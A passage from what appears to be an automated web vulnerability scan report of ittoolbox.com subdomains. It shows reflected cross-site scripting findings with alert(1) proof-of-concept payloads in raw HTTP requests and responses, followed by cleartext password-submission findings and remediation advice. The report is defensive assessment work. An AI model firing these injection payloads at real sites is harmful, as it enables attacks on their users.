The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d160d"style%3d"x%3aexpression(alert(1))"7853bc49d25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d160d"style="x:expression(alert(1))"7853bc49d25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?d160d"style%3d"x%3aexpression(alert(1))"7853bc49d25=1 HTTP/1.1
Host: visualbasic.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64214
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=w3hcalnbh2ca1lq4t0b3k045; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Visual Basi
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://visualbasic.ittoolbox.com/Default.aspx?d160d"style="x:expression(alert(1))"7853bc49d25=1" />
...[SNIP]...

3.126. http://visualbasic.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://visualbasic.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f46f'-alert(1)-'e6df936efc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?5f46f'-alert(1)-'e6df936efc7=1 HTTP/1.1
Host: visualbasic.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64101
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=up3ioy3qkgfjhf45mcfgsr45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Visual Basi
...[SNIP]...
null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fvisualbasic.ittoolbox.com%2fDefault.aspx%3f5f46f'-alert(1)-'e6df936efc7%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.127. http://webdesign.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webdesign.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee5ed"style%3d"x%3aexpression(alert(1))"f7194a0e58c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee5ed"style="x:expression(alert(1))"f7194a0e58c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?ee5ed"style%3d"x%3aexpression(alert(1))"f7194a0e58c=1 HTTP/1.1
Host: webdesign.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79637
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=00e2w3azkf33b545g112yh2z; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Web Design
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://webdesign.ittoolbox.com/Default.aspx?ee5ed"style="x:expression(alert(1))"f7194a0e58c=1" />
...[SNIP]...

3.128. http://webdesign.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webdesign.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab989'-alert(1)-'b6f9a2d805d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?ab989'-alert(1)-'b6f9a2d805d=1 HTTP/1.1
Host: webdesign.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79522
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uxlfv345zhqpvpeuonz2kv45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Web Design
...[SNIP]...
!= null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fwebdesign.ittoolbox.com%2fDefault.aspx%3fab989'-alert(1)-'b6f9a2d805d%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.129. http://windows.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://windows.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5da5"style%3d"x%3aexpression(alert(1))"772a40a5363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5da5"style="x:expression(alert(1))"772a40a5363 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?e5da5"style%3d"x%3aexpression(alert(1))"772a40a5363=1 HTTP/1.1
Host: windows.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 77834
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hru05fay2kpqom45r51hkl55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Windows Com
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://windows.ittoolbox.com/Default.aspx?e5da5"style="x:expression(alert(1))"772a40a5363=1" />
...[SNIP]...

3.130. http://windows.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://windows.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe485'-alert(1)-'016acc0ce27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?fe485'-alert(1)-'016acc0ce27=1 HTTP/1.1
Host: windows.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 77719
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pku3pkzbr11csbm3zmo51i45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Windows Com
...[SNIP]...
r != null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fwindows.ittoolbox.com%2fDefault.aspx%3ffe485'-alert(1)-'016acc0ce27%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.131. http://wireless.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wireless.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d3b"style%3d"x%3aexpression(alert(1))"945885bc9e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56d3b"style="x:expression(alert(1))"945885bc9e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?56d3b"style%3d"x%3aexpression(alert(1))"945885bc9e1=1 HTTP/1.1
Host: wireless.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73740
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wgga4r45yhrf2sa5hxcqbv55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Wireless Co
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://wireless.ittoolbox.com/Default.aspx?56d3b"style="x:expression(alert(1))"945885bc9e1=1" />
...[SNIP]...

3.132. http://wireless.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wireless.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4bba'-alert(1)-'d2be5206969 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?c4bba'-alert(1)-'d2be5206969=1 HTTP/1.1
Host: wireless.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73627
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=j4evph55wxm3fduifcqxhhew; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Wireless Co
...[SNIP]...
!= null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fwireless.ittoolbox.com%2fDefault.aspx%3fc4bba'-alert(1)-'d2be5206969%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4. Cleartext submission of password  previous  next
There are 89 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


4.1. http://businessintelligence.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://businessintelligence.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: businessintelligence.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79300
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lgzfjg45p5p4ttjbryycmjiv; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Business In
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.2. http://c.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: c.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73410
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=q4lyzl45xau0xnefonms5145; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   C Languages
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.3. http://cio.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70865
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ev3vw13ts4uun2552nfwiz45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   CIO Communi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.4. http://cio.ittoolbox.com/blogs/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /blogs/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 85344
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=sthdbdnv4isdq155nf5krjic; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.5. http://cio.ittoolbox.com/directory/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /directory/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /directory/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 52564
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=el0hjp55tk5oie55qdseux55; path=/; HttpOnly
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.ittoolbox.com; expires=Tue, 26-Apr-2011 13:49:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/directory/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.6. http://cio.ittoolbox.com/documents/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /documents/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /documents/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28204
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kqpydg55prajw345gnpd1jaz; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/documents/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.7. http://cio.ittoolbox.com/events/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /events/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /events/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38997
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uu0vpmjgqupns155oiaxug55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/events/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.8. http://cio.ittoolbox.com/groups/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /groups/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /groups/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 131235
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ttokbo25mimfaly03xopef55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/groups/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.9. http://cio.ittoolbox.com/research/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /research/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /research/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 96466
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mqlx3145uwj1pknllf1r5455; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/research/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.10. http://cio.ittoolbox.com/subscriptions/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /subscriptions/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /subscriptions/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27989
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vzkaha55kglahd45pvrgqp2s; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/subscriptions/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.11. http://cloud.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cloud.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: cloud.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 56007
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=edr0xeykfwnzlf55wgzg3zyo; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:35 GMT
Connection: close


